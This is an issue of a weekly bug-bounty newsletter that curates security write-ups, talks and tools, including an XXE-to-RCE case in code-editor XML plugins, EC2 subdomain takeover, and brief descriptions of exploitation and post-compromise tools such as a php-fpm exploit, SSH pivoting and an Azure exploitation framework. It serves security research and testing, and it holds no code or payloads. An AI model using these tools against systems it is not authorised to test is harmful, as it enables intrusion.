Bug Bytes #42 – XML to RCE, GitHub for Recon & Cloud Hacking Heaven

By Intigriti

October 29, 2019

Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series are curated by Mariem, better known as PentesterLand. Every week, she keeps us updated with a comprehensive list of all write-ups, tools, tutorials and resources we should not have missed.

This issue covers the week from 18 to 25 of October.

intigriti news

Our favorite 5 hacking items

1. Tools of the week

Github-subdomains.py
Erlenc

Github-subdomains.py is one of many Github scripts shared lately by @gwendallecoguic for Github recon. It takes a domain as input and returns its subdomains found on Github.
Sometimes, this is just what you need for recon or OSINT!
Erlenc also does one thing: It is a command line tool for URL-encoding and URL-decoding data streams. It can be useful for scripting, or if you find yourself playing with URL encoding all the time during tests.

2. Writeup of the week

Don’t open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, …

Exploiting an XXE during a pentest unexpectedly triggered two DNS interactions instead of one. This led the authors to investigate, and discover that opening the XXE payload in their text editor was triggering the second interaction.
What could have been neglected by others became the subject of very interesting research. From weaponizing the XXE to get RCE, to testing other products that share the same underlying vulnerable library… There are many lessons in this writeup, both technical and about mindset and tenacity.

3. Conference of the week

Kawaiicon 2019 – Liar, Liar: a first-timer “red-teaming” under unusual restrictions

This is the story of an unusual red teaming mission. I don’t want to spoil it by saying to much. So, let’s just that it is captivating, witty, and perfect for those times when you want to relax while still doing something hacking-related.

4. Resource of the week

Cloud Security Wiki

This is a collection of links for cloud security (from both offensive and defensive aspects). They are organized by topic: AWS/Google/Azure Cloud, vulnerable apps, Kubernetes and Docker.
It is nice to have all these resources at the same place. It should help if you’re interested in Cloud security and don’t know where to start.
I am also realizing there are some tools and presentations listed that I haven’t checked out yet.

5. Article of the week

Attempting EC2 Subdomain Takeover

Subdomain takeover get harder to find on bug bounty programs. This article breaks down a more subtle form of the attack which affects some subdomains pointing to EC2 instances.
Who knows, it might help you get some of those juicy bounties!

Other amazing things we stumbled upon this week

Videos

Podcasts

Webinars & Webcasts

Conferences

Slides only

Tutorials

Medium to advanced

Beginners corner

Writeups

Challenge writeups

Pentest writeups

Responsible(ish) disclosure writeups

Bug bounty writeups

See more writeups on The list of bug bounty writeups.

Tools

If you don’t have time

  • Stepper: A Burp extension designed to be a natural evolution of Burp Suite’s Repeater tool, providing the ability to create sequences of steps and define regular expressions to extract values from responses which can then be used in subsequent steps

  • GitHunter: A tool for searching a Git repository for interesting content

  • Jsfuzz: Coverage-guided fuzzer for testing JavaScript/NodeJS packages

More tools, if you have time

  • Domain-finder: Quick script to find domains who belong to a company through http://whoxy.com (key required but free)

  • Apk-mitm: A CLI application that prepares Android APK files for HTTPS inspection

  • Ntlmscan: Scan for NTLM directories

  • Dirstalk: Modern alternative to dirbuster/dirb

  • RAS-Fuzzer: RAndom Subdomain Fuzzer

  • SUID3NUM: Python script to enumerate SUID binaries, separate default binaries from custom binaries, cross-match those with bins in GTFO Bin’s repository & auto-exploit those

  • BabooSSH: Python script that allows you, from a simple SSH connection to a compromised host, to quickly gather info on other SSH endpoints to pivot and compromise them.

  • Lava: Microsoft Azure exploitation framework

  • HomePWN: Swiss Army Knife for Pentesting of IoT Devices

  • OneLogicalMyth_Shell: A HTA shell to assist with breakout assessments

  • PHuiP-FPizdaM: Exploit for a bug in php-fpm (CVE-2019-11043)

Misc. pentest & bug bounty resources

Challenges

Articles

News

Bug bounty & Pentest news

Reports

Vulnerabilities

Breaches & Attacks

Malicious apps/sites

Other news

Non technical

Tweeted this week

We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 10/18/2019 to 10/25/2019.

Curated by Pentester Land & Sponsored by Intigriti Disclaimer:The views and opinions expressed in this article are those of the curators and do not necessarily reflect the position of intigriti.

You may also like